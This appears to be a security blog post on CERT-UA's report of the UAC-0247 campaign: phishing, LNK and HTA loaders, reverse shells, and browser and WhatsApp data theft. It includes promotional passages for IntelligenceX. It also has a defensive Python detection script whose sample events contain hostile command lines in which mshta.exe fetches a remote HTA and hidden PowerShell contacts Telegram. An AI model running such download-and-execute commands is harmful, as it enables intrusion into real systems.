Ukraine’s national cyber defense authority, CERT-UA, has revealed details of a coordinated cyber operation that targeted government institutions and healthcare organizations, including clinics and emergency response units. The campaign, tracked as UAC-0247, focuses on deploying malware capable of extracting sensitive data from Chromium-based browsers and WhatsApp sessions.
The activity was observed during March and April 2026. While the group behind the operation has not yet been officially identified, the techniques used suggest a well-organized threat actor with a clear objective: gaining access to sensitive information and maintaining persistent control over compromised systems.
How the Attack Begins
The entry point for the attack is a carefully crafted phishing email. These emails are disguised as humanitarian aid proposals, a tactic likely chosen to exploit trust and urgency among recipients.
The message contains a link that directs victims to either a legitimate website that has been compromised or a fake page created using AI-generated content. In cases where legitimate websites are used, attackers exploit cross-site scripting vulnerabilities to inject malicious elements. Regardless of the method, the outcome remains the same — convincing the user to download a malicious file.
From Download to Execution
Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut file (LNK). Opening this file triggers the execution of a remote HTML Application (HTA) via the built-in Windows tool “mshta.exe.”
The HTA file is designed to distract the user by displaying a decoy interface while it quietly initiates the next stage of the attack. Behind the scenes, it downloads a binary payload that injects malicious code into legitimate system processes such as runtimeBroker.exe. This approach helps the malware remain hidden while carrying out its operations.
CERT-UA has also identified more advanced attack chains where a two-stage loader is used. The second stage is implemented in a custom executable format that supports structured code execution and dynamic imports. To further complicate analysis, the final payload is compressed and encrypted.
Establishing Control Over the System
A key component of the attack is the deployment of a reverse shell tool referred to as RAVENSHELL. This tool creates a connection between the infected machine and a remote command server, allowing attackers to execute commands using standard utilities like cmd.exe.
Alongside this, the attackers deploy a malware family known as AGINGFLY and a PowerShell-based component called SILENTLOOP. AGINGFLY is developed in C# and provides extensive control over the infected system. It communicates with its command server via WebSockets and supports a wide range of actions, including command execution, file transfers, and keylogging.
SILENTLOOP enhances the reliability of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure communication persists even if primary channels are disrupted.
Data Theft and Lateral Movement
The primary objective of the campaign is data exfiltration. Attackers focus on extracting credentials, browser data, and communication records. To achieve this, they deploy tools designed to bypass browser encryption and retrieve stored passwords and cookies from Chromium-based applications.
They also use specialized utilities to access WhatsApp Web data, allowing them to capture user conversations. Additional tools enable network scanning, tunneling, and lateral movement within compromised environments, increasing the overall impact of the intrusion.
In some cases, cryptocurrency mining tools have also been observed, indicating that financial gain may be an additional motive behind the campaign.
There is also evidence suggesting that individuals connected to Ukraine’s defense sector have been targeted. In such instances, malicious files were distributed through messaging platforms, further expanding the reach of the campaign.
Challenges in Detection
This campaign is particularly difficult to detect due to its use of legitimate system tools and multi-stage execution techniques. By blending malicious activity with normal system behavior, attackers are able to bypass traditional security defenses.
This is where platforms like IntelligenceX become valuable. IntelligenceX provides visibility into exposed assets, malicious infrastructure, and threat patterns, helping organizations identify risks before they escalate into full-scale incidents.
By leveraging IntelligenceX, security teams can monitor suspicious domains, analyze attacker infrastructure, and correlate intelligence across multiple data sources. This proactive approach is essential for detecting advanced threats that rely on stealth and persistence.
Defensive Recommendations
To mitigate the risks associated with campaigns like UAC-0247, organizations should restrict the execution of file types commonly used in attacks, such as LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe, PowerShell, and wscript.exe can also reduce the attack surface.
In addition, organizations should invest in user awareness training to reduce the effectiveness of phishing attempts and implement strong monitoring systems to detect unusual activity.
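As an added example, not code from the CERT-UA advisory or this post: a small Python triage routine that flags the process-creation patterns described above (mshta.exe fetching a remote HTA, mshta.exe handing off to a scripting host, PowerShell reaching Telegram for a command server address) over constructed Sysmon-style events. The file paths, URLs, and field names are assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style
# fields); not telemetry from the CERT-UA report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.example/aid.hta"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c iwr https://t.me/s/placeholder"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\Desktop\report.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Chrome\chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumed Telegram hostnames to watch for in command lines.
TELEGRAM_RE = re.compile(r"\bt\.me\b|telegram\.org", re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe")


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the rule names matched by one process-creation event."""
    hits = []
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    # Rule 1: mshta.exe given a remote URL (the LNK -> remote HTA stage).
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
    # Rule 2: a scripting host spawned by mshta.exe (HTA launching the next stage).
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        hits.append("mshta_spawns_script_host")
    # Rule 3: PowerShell contacting Telegram (SILENTLOOP-style C2 address lookup).
    if image == "powershell.exe" and TELEGRAM_RE.search(cmd):
        hits.append("powershell_telegram_lookup")
    return hits


def scan(events):
    """Map event index -> matched rules, omitting events that match nothing."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

A locally opened HTA with no URL (event 2) is deliberately not flagged by these rules, so pair them with the execution restrictions above rather than relying on them alone.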
Final Thoughts
The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical sectors. By combining social engineering with advanced malware techniques, attackers are able to infiltrate systems and extract sensitive information with minimal detection.
To stay ahead of these threats, organizations must adopt a proactive and intelligence-driven security strategy. Leveraging tools like IntelligenceX, along with strong internal controls and continuous monitoring, can significantly improve an organization’s ability to detect and respond to evolving cyber risks.